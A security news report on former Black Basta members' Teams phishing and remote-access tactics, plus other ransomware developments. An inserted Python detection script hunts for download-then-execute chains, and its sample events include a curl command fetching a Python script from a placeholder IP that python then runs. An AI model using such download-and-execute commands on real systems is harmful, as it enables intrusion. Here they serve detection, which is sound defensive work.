Former Black Basta members use Microsoft Teams and Python scripts in 2025 attacks

June 11, 2025
Former members associated with the Black Basta ransomware operation have been observed sticking with their tried-and-tested approach of email bombing and Microsoft Teams phishing to establish persistent access to target networks.

“Recently, attackers have introduced Python script execution alongside these techniques and deployed malicious payloads using cURL requests,” ReliaQuest said in a report shared with The Hacker News.

The development is a sign that threat actors continue to pivot and regroup despite the Black Basta brand suffering a major blow and decline following the leak of its internal chat logs in early February.

The cybersecurity company said half of the Teams phishing attacks it observed between February and May 2025 originated from onmicrosoft(.)com domains, with compromised domains accounting for 42% of attacks over the same period. The latter approach is far stealthier, since it lets threat actors blend in with legitimate traffic.

As in the previous month, ReliaQuest customers in the financial and insurance sector and in construction are being targeted by Teams phishing in which attackers pose as help desk personnel to trick unsuspecting users.

“The closure of Black Basta’s data leak site indicates that despite the continued use of its tactics, it is likely that the previous affiliates have moved to another RaaS group or formed a new group,” the company added. “The most likely scenario is that a former member has joined the Cactus RaaS group, evidenced by Trump, the leader of Black Basta, who refers to a $500-600,000 payment to Cactus in leaked chats.”

That said, it is worth noting that Cactus has not named any organizations on its data leak site since March 2025. This indicates that the group has either disbanded or is deliberately trying to avoid attracting attention to itself. Another possibility is that affiliates have moved to BlackLock, which is believed to have begun working with a ransomware cartel named DragonForce.

Threat actors also use the access obtained through Teams phishing to establish an initial remote desktop session via Quick Assist or AnyDesk, then download malicious Python scripts from a remote address and run them to establish command-and-control (C2) communication.

“The use of Python scripts in this attack highlights evolving tactics that are likely to become more common in future Teams phishing campaigns in the near future,” ReliaQuest said.
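The chain described above (remote-assistance session, a .py fetched with a command-line downloader, then executed by the Python interpreter on the same host) can be hunted for in endpoint process-creation telemetry. The following is an added detection example, not ReliaQuest's code or anything from the original article; the event records, hostnames and the 203.0.113.9 address are constructed samples, and the field names are assumptions about a generic EDR export.

```python
import re
from datetime import datetime, timedelta

# Constructed sample process-creation events (not from the article). WS-17 shows the
# download-then-execute chain spawned under a Quick Assist session; DEV-02 is a developer
# who fetched a script in the morning and ran it hours later, outside the window.
SAMPLE_EVENTS = [
    {"ts": "2025-06-01T08:00:00", "host": "DEV-02", "parent": "powershell.exe",
     "image": "curl.exe", "cmdline": "curl.exe -o C:\\repo\\tests\\run.py https://example.com/run.py"},
    {"ts": "2025-06-01T10:02:11", "host": "WS-17", "parent": "quickassist.exe",
     "image": "curl.exe", "cmdline": "curl.exe -s -o C:\\Users\\Public\\upd.py http://203.0.113.9/upd.py"},
    {"ts": "2025-06-01T10:03:40", "host": "WS-17", "parent": "cmd.exe",
     "image": "python.exe", "cmdline": "python.exe C:\\Users\\Public\\upd.py"},
    {"ts": "2025-06-01T11:15:00", "host": "DEV-02", "parent": "code.exe",
     "image": "python.exe", "cmdline": "python.exe C:\\repo\\tests\\run.py"},
]

DOWNLOADERS = {"curl.exe", "wget.exe", "bitsadmin.exe", "certutil.exe"}
REMOTE_TOOLS = {"quickassist.exe", "anydesk.exe"}   # remote-assistance parents named in the article
PY_PATH = re.compile(r"([A-Za-z]:\\\S+?\.py)\b", re.IGNORECASE)  # Windows path ending in .py


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def find_python_payload_chains(events, window_minutes=15):
    """Return one alert per .py fetched by a downloader and executed by python on the same
    host within window_minutes. remote_session marks downloads spawned under Quick Assist/AnyDesk."""
    alerts = []
    for d in events:
        m = PY_PATH.search(d["cmdline"]) if d["image"].lower() in DOWNLOADERS else None
        if not m:
            continue
        path = m.group(1).lower()
        for e in events:
            if e["host"] != d["host"] or not e["image"].lower().startswith("python"):
                continue
            delta = _ts(e) - _ts(d)
            if timedelta(0) <= delta <= timedelta(minutes=window_minutes) and path in e["cmdline"].lower():
                alerts.append({"host": d["host"], "path": path,
                               "remote_session": d["parent"].lower() in REMOTE_TOOLS,
                               "download_cmd": d["cmdline"], "exec_cmd": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in find_python_payload_chains(SAMPLE_EVENTS):
        print(f"{a['host']}: {a['path']} (remote-assist parent: {a['remote_session']})")
```

Tuning the window and the downloader list to the environment is the main source of false positives; the remote-assistance parent flag is what separates this pattern from ordinary developer activity.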

Black Basta-style social engineering, which combines email spam, Teams phishing and Quick Assist, has also found takers within the Black Suit ransomware group, raising the likelihood that Black Suit affiliates have either adopted the group’s approach or absorbed its members.

According to Rapid7, the initial access serves as a pathway to download and run updated variants of a Java-based RAT that was previously deployed as a credential harvester in Black Basta attacks.

“The Java malware abuses the cloud-based file hosting services that both Google and Microsoft provide to proxy commands through their respective cloud service provider (CSP) servers,” the company said. “As time has passed, the malware developers have recently moved to using Google Drive, heading toward direct proxy connections (i.e., configuration options left blank or not present), OneDrive and Google Sheets.”

A new iteration of the malware transfers files between the infected host and the remote server, starts a SOCKS5 proxy tunnel, steals credentials stored in web browsers, presents a fake Windows login window, and downloads Java classes from an embedded URL and runs them in memory.

Like the 3AM ransomware attack detailed by Sophos a few weeks ago, the intrusions are also characterized by the use of a tunneling backdoor called QDoor, malware previously attributed to Black Suit, along with a custom loader for an SSH utility and a Rust-based payload that delivers a Python RAT called Anubis.

The findings come amid a number of other developments in the ransomware landscape:

  • The financially motivated group known as Scattered Spider is targeting managed service providers (MSPs) and IT vendors as part of a “one-to-many” approach that reaches multiple organizations through a single compromise.
  • Scattered Spider has bypassed multi-factor authentication (MFA) by using the Evilginx phishing kit to create fake login pages, and has forged strategic alliances with leading ransomware operators such as ALPHV (aka BlackCat), RansomHub and DragonForce.
  • Qilin (aka Agenda and Phantom Mantis) ransomware operators launched a coordinated intrusion campaign targeting several organizations between May and June 2025, weaponizing Fortinet FortiGate vulnerabilities (such as CVE-2024-21762 and CVE-2024-55591) for initial access.
  • The Play (aka Balloonfly and PlayCrypt) ransomware group is estimated to have compromised 900 entities as of May 2025. Some attacks have leveraged a SimpleHelp flaw (CVE-2024-57727) to target many US-based entities after the vulnerability was disclosed.
  • The administrator of the VanHelsing ransomware group leaked the operation’s entire source code on the RAMP forum, citing an internal dispute between developers and leadership. The leaked material includes the TOR keys for its blog, ransomware source code, administrator web panels, chat systems, file servers and a complete database.
  • The Interlock ransomware group deployed a previously undocumented JavaScript remote access trojan as part of attacks targeting UK local governments and higher education organizations between January and March 2025.

“The RAT allows attackers to remotely control infected systems, access files, monitor activity and manipulate system settings,” Quorum Cyber said. “Threat actors can use the RAT to maintain persistence within an organization, deploy additional tools and malware in its environment, and also access, manipulate, destroy or remove data.”
